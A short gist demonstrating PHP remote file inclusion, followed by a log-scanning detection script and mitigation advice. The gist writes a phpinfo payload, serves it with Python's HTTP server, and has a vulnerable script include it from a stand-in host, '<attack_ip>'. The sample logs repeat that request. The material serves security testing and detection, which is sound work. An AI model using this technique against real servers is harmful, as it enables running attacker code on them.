jakekarnes42/938d3fbd7a87bdb7fde02fbcb69f8bc0
Created August 12, 2019 22:34
Example for testing PHP RFI
$ mkdir evil_files
$ cat > evil_files/phpinfo.txt
<?php
phpinfo();
?>
Next, we need to serve the file. Python has a built-in web server module we can use for this.
$ cd evil_files
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Now we just need to point our vulnerable script at our attacking system, with the following URI:
http://<attack_ip>:8000/phpinfo.txt
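
On the web server being tested, a request like the one above shows up in the access log as a query parameter whose value is a remote URL. The following is an added example, not part of the original gist, that scans combined-format access log lines for such values. The function name, the script and parameter names (index.php?page=, login.php?return=) and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value that begins with a remote URL scheme, as in the test URI above.
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)

def find_remote_includes(log_lines, trusted_hosts=frozenset()):
    """Return (client, parameter, value) for query values that hold a remote URL.

    trusted_hosts lists hostnames that legitimately appear in parameters
    (for example the site's own redirect targets) and are not reported.
    """
    hits = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we can parse
        query = urlsplit(match.group("target")).query
        # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if not REMOTE_RE.match(value):
                continue
            if urlsplit(value).hostname in trusted_hosts:
                continue
            hits.append((match.group("client"), name, value))
    return hits

# Constructed sample lines: documentation addresses, hypothetical script and parameter names.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2019:22:40:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Aug/2019:22:41:17 +0000] "GET /index.php?page=http://198.51.100.7:8000/phpinfo.txt HTTP/1.1" 200 90211',
    '203.0.113.9 - - [12/Aug/2019:22:41:30 +0000] "GET /index.php?page=http%3A%2F%2F198.51.100.7%3A8000%2Fphpinfo.txt HTTP/1.1" 200 90211',
    '203.0.113.5 - - [12/Aug/2019:22:42:02 +0000] "GET /login.php?return=https://www.example.com/home HTTP/1.1" 302 0',
    '203.0.113.7 - - [12/Aug/2019:22:43:10 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 733',
]

if __name__ == "__main__":
    for client, name, value in find_remote_includes(SAMPLE_LOG, {"www.example.com"}):
        print(f"{client} parameter={name} value={value}")
```

Detection complements the fix: keep allow_url_include set to Off in php.ini and map the parameter to an allow-list of local files instead of passing it to include.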